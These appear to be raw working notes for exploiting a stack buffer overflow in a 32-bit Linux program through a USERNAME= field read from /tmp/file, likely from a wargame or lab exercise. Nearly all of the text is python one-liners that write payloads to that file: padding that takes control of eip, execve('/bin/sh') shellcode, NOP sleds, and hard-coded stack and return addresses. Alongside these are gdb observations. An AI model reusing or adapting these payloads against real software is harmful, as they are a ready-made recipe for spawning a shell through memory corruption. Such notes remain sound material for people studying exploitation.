 file address : 0x0804b008 at 0xbffffab8 + 4 (right after init structure)

gives us control of eip:
 python -c "import sys; sys.stdout.write('USERNAME=' + 'A'*135 + 'B' + '\x08\xb0\x04\x08' + 'B'*30)" > /tmp/file

 start of string :
 0xbffff840


 that does it in gdb :
 python -c "import sys; sys.stdout.write('USERNAME=' + '\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + 'A'*97 + 'B' + '\x08\xb0\x04\x08' + 'B'*28 + '\x3c\xf8\xff\xbf')" > /tmp/file

 with nops:
 python -c "import sys; sys.stdout.write('USERNAME=' + '\x90'*50 + '\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x90'*47 + 'B' + '\x08\xb0\x04\x08' + 'B'*28 + '\x3c\xf8\xff\xbf')" > /tmp/file


cleaner :
python -c "import sys; sys.stdout.write('USERNAME=' + '\x90'*50 + '\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x90'*48 + '\x08\xb0\x04\x08' + '\x90'*28 + '\x3c\xf8\xff\xbf')" > /tmp/file


real :

0xbffffa64 (username) 0x804b008 (file)

segfaults at return of Init (after fclose)
